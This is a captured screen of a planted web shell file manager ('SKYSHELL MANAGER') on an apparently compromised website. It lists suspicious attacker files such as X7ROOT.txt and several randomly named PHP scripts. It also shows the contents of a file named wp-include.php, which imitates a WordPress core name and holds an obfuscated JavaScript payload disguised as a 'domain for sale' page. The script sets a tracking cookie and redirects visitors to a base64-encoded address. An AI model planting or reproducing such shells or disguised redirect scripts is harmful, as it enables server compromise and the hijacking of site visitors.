📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.38 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: wp-include.php
<!-- 643800252376 --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex,noarchive,nofollow"> <style> body { font-family: system-ui, sans-serif; margin: 0; padding: 24px; } .hidden { display: none !important; } .card { max-width: 720px; margin: 0 auto; padding: 18px; border: 1px solid #ddd; border-radius: 12px; } .muted { opacity: .75; } </style> </head> <body> <div id="teaser" class="card hidden"> <h1>This domain is for sale</h1> <p class="muted">Re-visit the page to contact the owner.</p> </div> <div id="details" class="card hidden"> <h1>This domain is for sale</h1> <h3>Contact the Owner</h3> <form id="contactForm"> <div style="margin-bottom: 16px;"> <label for="name" style="display: block; margin-bottom: 4px;">Name</label> <input type="text" id="name" name="name" maxlength="64" required style="width: 100%; padding: 8px; border: 1px solid #ccc; border-radius: 6px; box-sizing: border-box;"> </div> <div style="margin-bottom: 16px;"> <label for="email" style="display: block; margin-bottom: 4px;">Email</label> <input type="email" id="email" name="email" maxlength="64" required style="width: 100%; padding: 8px; border: 1px solid #ccc; border-radius: 6px; box-sizing: border-box;"> </div> <div style="margin-bottom: 16px;"> <label for="message" style="display: block; margin-bottom: 4px;">Message</label> <textarea id="message" name="message" maxlength="256" rows="4" required style="width: 100%; padding: 8px; border: 1px solid #ccc; border-radius: 6px; box-sizing: border-box; resize: vertical;"></textarea> </div> <div aria-hidden="true" style="position:absolute; left:-9999px; width:1px; height:1px; overflow:hidden;"> <label for="website">Website</label> <input type="text" id="website" name="website" maxlength="256" tabindex="-1" autocomplete="off"> </div> <button type="submit" style="padding: 10px 20px; background: #007bff; color: white; border: none; border-radius: 6px; cursor: pointer;"> Send </button> </form> </div> <script nonce="TDgTN5okYtHLq/BNwNWRjw=="> (function(){ function __d(N,d){N=N-(-0x8fe+-0x1523+-0xfae*-0x2);const m=__N();let M=m[N];return M;}function __N(){const NZ=['email','Jtgnr','target','1111rrOWck','578ijuoAD','PnqXd','ror','domain_sal','7zFywru','remove','ById','replace','4757862AVJaCa','CBWdQ','1019rOOEbl','location','4027896qTIvFH','2613459gXpNeQ','INPUT','45ubqXpA','221644OdlYMg','contactFor','1317032ErYyxB','bFWoN','POST',';\x20Max-Age=','catch','70630fQhJyD','UbHxN','ZItEE','FqsEL'];__N=function(){return NZ;};return __N();}(function(N,d){const __R={N:0x14b,d:0x158,m:0x13e,M:0x143},O=__d,G=__d,Y=__d,i=__d,m=N();while(!![]){try{const M=parseInt(O(0x155))/(0x3*0x63d+0xb5f+-0x1e15)*(parseInt(G(__R.N))/(-0x1*-0x11fc+0x3f4+-0x15ee))+parseInt(Y(__R.d))/(-0x1fcc+0x463*0x4+0xe43)+-parseInt(G(0x13c))/(0x12d6+0x16*0xe+-0xa03*0x2)*(parseInt(G(0x13b))/(0x1*-0x2349+-0x8+0x2356))+parseInt(G(0x153))/(-0x2291+0x107*0x1+0x2190)+parseInt(O(0x14f))/(0xff6+-0x155*-0xf+-0x23ea)*(parseInt(i(__R.m))/(0x167b+-0x265a+-0xfe7*-0x1))+-parseInt(G(0x157))/(0x1*0x26f1+-0x1dd4+-0x914)+parseInt(O(__R.M))/(-0x5e*-0x2a+-0x5a+-0xf08)*(-parseInt(i(0x14a))/(0x1ba8+0x1*-0xb65+-0x1038));if(M===d)break;else m['push'](m['shift']());}catch(T){m['push'](m['shift']());}}}(__N,-0x491*-0x9d+-0x97a3d+0xdc06c));function __r(N){const __NI={N:0x145,d:0x151},__NV={N:0x14c},__NT={N:0x148},__NM={N:0x152},__NN={N:0x14d,d:0x154,m:0x140,M:0x146},__N7={N:0x159,d:0x149},x=__d,J=__d,n=__d,t=__d,d={'VJYQX':function(r,P){return r===P;},'QAowL':function(r,P){return r(P);},'UTjVQ':'Message\x20se'+'nt!','CBWdQ':function(r,P){return r-P;},'HVqDE':'[name=\x22web'+'site\x22]','hPckU':function(r,P,W){return r(P,W);},'FqsEL':'applicatio'+'n/json','RWIKi':function(r,P){return r(P);},'WCfAE':'NAUVX','DbKkd':function(r,P){return r>=P;},'GxeQz':function(r,P){return r(P);},'Jtgnr':function(r,P){return r+P;},'hilob':'https:','PnqXd':';\x20Secure','Qgblr':function(r,P){return r+P;},'ZItEE':'focusin','UbHxN':x(0x14e)+'e_seen','ZLQJm':'teaser','QlVil':function(r,P){return r(P);},'BwKsM':function(r,P,W,h){return r(P,W,h);}};var m=Date['now'](),M=![],T=-0x6be+-0x526*0x1+0x2354,V=document['getElement'+'ById'](J(0x13d)+'m');V['addEventLi'+'stener'](d[n(__NI.N)],function(r){const k=x,q=x;r['isTrusted']&&(d['VJYQX'](r['target']['tagName'],k(__N7.N))||r[q(__N7.d)]['tagName']==='TEXTAREA')&&(M=!![]);}),V['addEventLi'+'stener']('submit',function(r){const __N9={N:0x13f},u=n,c=n,p=n,g=n,P={};P['bFWoN']='Network\x20er'+u(__NN.N);const W=P;r['preventDef'+'ault']();var h=d[c(__NN.d)](Date['now'](),m);if(!M||h<T)return;var X={'name':V['name']['value'],'email':V[p(0x147)]['value'],'message':V['message']['value'],'H':V['querySelec'+'tor'](d['HVqDE'])['value']};d['hPckU'](fetch,location['origin']+'/saleform',{'method':p(__NN.m),'headers':{'e':d[u(__NN.M)]},'body':JSON['stringify'](X)})['then'](function(s){s['ok']?(V['reset'](),d['QAowL'](alert,d['UTjVQ'])):d['QAowL'](alert,'Error\x20send'+'ing\x20messag'+'e');})[c(0x142)](function(){const b=u;alert(W[b(__N9.N)]);});});function I(){const A=x,r=atob(N);try{window['location'][A(__NM.N)](r);}catch(P){}setTimeout(function(){window['location']['href']=r;},-0x11ed+-0x1*-0x9c1+0x890),d['hPckU'](setTimeout,function(){const S=A;window[S(0x156)]['assign'](r);},-0x121f+-0xec9*-0x2+0x97f*-0x1);}const Z=d[J(0x144)],B=(-0x1f1a*-0x1+-0x1361+0xbaa*-0x1)*(-0x22c1*-0x1+-0x4e+-0x2237);function L(r){const o=n,P=document['cookie']['split'](';\x20');for(const h of P){if(d['WCfAE']===d['WCfAE']){const X=h['indexOf']('='),s=d['DbKkd'](X,0x44*-0x4a+0x84*0x21+0x2a4)?h['slice'](-0x1ad7+0x1e2d+-0xe*0x3d,X):h;if(s===r)return X>=-0x25ce+0x151b*-0x1+0x3ae9?d['GxeQz'](decodeURIComponent,h['slice'](d[o(__NT.N)](X,0x8b*0x5+0x3*-0x7+0x1*-0x2a1))):'';}else{const a=M['cookie']['split'](';\x20');for(const v of a){const w=v['indexOf']('='),j=w>=-0x198a+0x2d*0x35+-0x1*-0x1039?v['slice'](-0x19af+0x212b+-0x77c,w):v;if(j===B)return w>=-0xf1*0x25+-0x9dc*0x2+0x368d?d['RWIKi'](L,v['slice'](w+(0x5*-0x1c4+-0x1433*-0x1+0x6*-0x1e5))):'';}return null;}}return null;}function F(r,P,W){const Q=J,U=J,h=location['protocol']===d['hilob']?d[Q(__NV.N)]:'';document['cookie']=d['Qgblr'](d['Jtgnr'](r+'='+encodeURIComponent(P),Q(0x141)+W)+';\x20Path=/',';\x20SameSite'+'=Lax')+h;}const E=document['getElement'+x(__NI.d)](d['ZLQJm']),y=document['getElement'+'ById']('details'),C=d['QlVil'](L,Z)==='1';!C&&N!==''?(d['BwKsM'](F,Z,'1',B),E['classList'][n(0x150)]('hidden'),setTimeout(I,-0x20c3+-0xc20+0x3*0x1191)):y['classList']['remove']('hidden');} __r('') })(); </script> </body> </html>
Save